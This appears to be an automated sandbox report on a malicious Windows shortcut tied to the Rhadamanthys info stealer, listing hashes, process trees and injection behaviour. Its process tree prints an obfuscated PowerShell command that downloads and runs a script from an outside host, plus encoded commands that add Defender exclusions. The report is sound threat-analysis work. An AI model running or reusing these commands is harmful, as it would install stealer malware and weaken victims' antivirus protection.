Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
28-05-2024 05:10
Static task
static1
Behavioral task
behavioral1
Sample
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
Resource
win10v2004-20240426-en
General
-
Target
7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk
-
Size
2KB
-
MD5
7bcf325993d873a5dc95ac8ffb5f25eb
-
SHA1
d40d48977261656e9ebc98397baceb0d04539578
-
SHA256
4b269a6e40b9b7c7c8068e046c1ff815ac917699943597e8a9e512ef60cc685f
-
SHA512
c5f1ec4cb54e33d6541651531db9a771aeac817bb2ea94ee52b807984af4df029a64028c1c47d47c27611dfd3757fb144e2d0f91fda98828ddd1c7ba19593010
Malware Config
Extracted
http://timebound.ug/pps.ps1
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 2580 created 1380 2580 bvasdvdfsds.exe 21 PID 3664 created 1380 3664 dfgdvdfsds.exe 21 PID 6128 created 1380 6128 cvbfsds.exe 21 PID 3052 created 1380 3052 bvcfsds.exe 21 -
pid Process 2580 powershell.exe 4616 powershell.exe 6044 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 2672 dsl.exe 2472 dsl.exe 1084 bvasdvdfsds.exe 2932 BLHisbnd.exe 2580 bvasdvdfsds.exe 3144 BLHisbnd.exe 7660 dfgdvdfsds.exe 3664 dfgdvdfsds.exe 3368 cvbfsds.exe 6128 cvbfsds.exe 6688 bvcfsds.exe 3052 bvcfsds.exe 2016 Tags.exe 6700 Tags.exe -
Loads dropped DLL 10 IoCs
pid Process 2472 dsl.exe 1084 bvasdvdfsds.exe 1084 bvasdvdfsds.exe 2932 BLHisbnd.exe 2472 dsl.exe 7660 dfgdvdfsds.exe 2472 dsl.exe 3368 cvbfsds.exe 2472 dsl.exe 6688 bvcfsds.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2472 dsl.exe 2472 dsl.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2672 set thread context of 2472 2672 dsl.exe 31 PID 1084 set thread context of 2580 1084 bvasdvdfsds.exe 36 PID 2932 set thread context of 3144 2932 BLHisbnd.exe 37 PID 7660 set thread context of 3664 7660 dfgdvdfsds.exe 41 PID 3368 set thread context of 6128 3368 cvbfsds.exe 48 PID 6688 set thread context of 3052 6688 bvcfsds.exe 51 PID 2016 set thread context of 6700 2016 Tags.exe 57 PID 6700 set thread context of 5724 6700 Tags.exe 58 PID 5724 set thread context of 2420 5724 InstallUtil.exe 59 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2580 powershell.exe 2580 bvasdvdfsds.exe 2580 bvasdvdfsds.exe 3252 dialer.exe 3252 dialer.exe 3252 dialer.exe 3252 dialer.exe 3664 dfgdvdfsds.exe 3664 dfgdvdfsds.exe 3756 dialer.exe 3756 dialer.exe 3756 dialer.exe 3756 dialer.exe 6128 cvbfsds.exe 6128 cvbfsds.exe 6496 dialer.exe 6496 dialer.exe 6496 dialer.exe 6496 dialer.exe 6044 powershell.exe 3052 bvcfsds.exe 3052 bvcfsds.exe 2856 dialer.exe 2856 dialer.exe 2856 dialer.exe 2856 dialer.exe 6700 Tags.exe 6700 Tags.exe 4616 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2672 dsl.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 1084 bvasdvdfsds.exe Token: SeDebugPrivilege 1084 bvasdvdfsds.exe Token: SeDebugPrivilege 2932 BLHisbnd.exe Token: SeDebugPrivilege 2932 BLHisbnd.exe Token: SeDebugPrivilege 3144 BLHisbnd.exe Token: SeDebugPrivilege 7660 dfgdvdfsds.exe Token: SeDebugPrivilege 7660 dfgdvdfsds.exe Token: SeDebugPrivilege 3368 cvbfsds.exe Token: SeDebugPrivilege 3368 cvbfsds.exe Token: SeDebugPrivilege 6044 powershell.exe Token: SeDebugPrivilege 6688 bvcfsds.exe Token: SeDebugPrivilege 6688 bvcfsds.exe Token: SeDebugPrivilege 2016 Tags.exe Token: SeDebugPrivilege 2016 Tags.exe Token: SeDebugPrivilege 6700 Tags.exe Token: SeDebugPrivilege 5724 InstallUtil.exe Token: SeDebugPrivilege 5724 InstallUtil.exe Token: SeDebugPrivilege 2420 InstallUtil.exe Token: SeDebugPrivilege 4616 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2672 dsl.exe 2472 dsl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2884 wrote to memory of 2580 2884 cmd.exe 36 PID 2884 wrote to memory of 2580 2884 cmd.exe 36 PID 2884 wrote to memory of 2580 2884 cmd.exe 36 PID 2580 wrote to memory of 2672 2580 powershell.exe 30 PID 2580 wrote to memory of 2672 2580 powershell.exe 30 PID 2580 wrote to memory of 2672 2580 powershell.exe 30 PID 2580 wrote to memory of 2672 2580 powershell.exe 30 PID 2672 wrote to memory of 2472 2672 dsl.exe 31 PID 2672 wrote to memory of 2472 2672 dsl.exe 31 PID 2672 wrote to memory of 2472 2672 dsl.exe 31 PID 2672 wrote to memory of 2472 2672 dsl.exe 31 PID 2672 wrote to memory of 2472 2672 dsl.exe 31 PID 2472 wrote to memory of 1084 2472 dsl.exe 34 PID 2472 wrote to memory of 1084 2472 dsl.exe 34 PID 2472 wrote to memory of 1084 2472 dsl.exe 34 PID 2472 wrote to memory of 1084 2472 dsl.exe 34 PID 1084 wrote to memory of 2932 1084 bvasdvdfsds.exe 35 PID 1084 wrote to memory of 2932 1084 bvasdvdfsds.exe 35 PID 1084 wrote to memory of 2932 1084 bvasdvdfsds.exe 35 PID 1084 wrote to memory of 2932 1084 bvasdvdfsds.exe 35 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 1084 wrote to memory of 2580 1084 bvasdvdfsds.exe 36 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2932 wrote to memory of 3144 2932 BLHisbnd.exe 37 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2580 wrote to memory of 3252 2580 bvasdvdfsds.exe 38 PID 2472 wrote to memory of 7660 2472 dsl.exe 39 PID 2472 wrote to memory of 7660 2472 dsl.exe 39 PID 2472 wrote to memory of 7660 2472 dsl.exe 39 PID 2472 wrote to memory of 7660 2472 dsl.exe 39 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 7660 wrote to memory of 3664 7660 dfgdvdfsds.exe 41 PID 3664 wrote to memory of 3756 3664 dfgdvdfsds.exe 42 PID 3664 wrote to memory of 3756 3664 dfgdvdfsds.exe 42 PID 3664 wrote to memory of 3756 3664 dfgdvdfsds.exe 42
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1380
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\7bcf325993d873a5dc95ac8ffb5f25eb_JaffaCakes118.lnk2⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timebound.ug/pps.ps1');s $nq3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Public\dsl.exe"C:\Users\Public\dsl.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Public\dsl.exe"C:\Users\Public\dsl.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2580
-
-
-
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:7660 -
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3368 -
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 06⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6688 -
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3052
-
-
-
-
-
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3252
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6496
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {4CED4DC8-3E2F-45DB-9D2E-3607DD9BC8D8} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:S4U:1⤵PID:6892
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {80753290-3273-43A7-8FCB-BC45AA844FFD} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]1⤵PID:3032
-
C:\Users\Admin\AppData\Local\Remaining\rdhgnpk\Tags.exeC:\Users\Admin\AppData\Local\Remaining\rdhgnpk\Tags.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Users\Admin\AppData\Local\Remaining\rdhgnpk\Tags.exe"C:\Users\Admin\AppData\Local\Remaining\rdhgnpk\Tags.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5724 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.4MB
MD5e13e6f7986b9d1eff55fe30133592c40
SHA18299d50b76990e9dc7e0a8cc67e2f4d44cb810f5
SHA256407e9094206a37707a368f4cd0103269c50b8c0c03edba87b4f20664d259f207
SHA512bb41209d410ff38c01279d119f646658e363a3055a4f152b6a2c76b9cdb1fb42441b243fa8f7fb7a353a1b0e78c619e499274185f40d8592e43551da46bd97a6
-
Filesize
5.3MB
MD5de08b70c1b36bce2c90a34b9e5e61f09
SHA11628635f073c61ad744d406a16d46dfac871c9c2
SHA256432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67
SHA51218a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54963e9294e9a68713a448d828a296568
SHA1f3697b3ffba06708355abe868bc8d89a38db336f
SHA2565020d5b6c86e5a1df5c8848a80ebd656dbd7b88b3f7e6caa5967524b1a839c8e
SHA51218ffa36d860b3a9b02be139fbc836d3a629ce1527afc35e222db20967a57eca59379a297f8f0e67363f5df17e3d745d66e052f185bc786ce4e662e9690c1ba1e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9PRCS3T3Y1OM5LC36NTN.temp
Filesize7KB
MD5aedf264814f1b885f6f7816a5690e0a5
SHA14cd6ce3a0a29a0a997f26a9b59ae7c0c5cc1eb8f
SHA2566c6a78a9857c2b9afe86aaeabd4cfbbabcd93b906613e59dd0dce7f7e1312acb
SHA51247d48d6f55f20ecf630f20a6de994c88a3df6e5ee2d9179b3c382522bf02ef7e8bcdab368370cfc774aba6374d49291776b58a5a5b53145899e214a2008712a0
-
Filesize
760KB
MD58333b78c2a3eacf8cfd843a7b62ce6ba
SHA181a4d7d00d04da14a6059ed068238a7e2321f721
SHA256aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665
SHA512c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27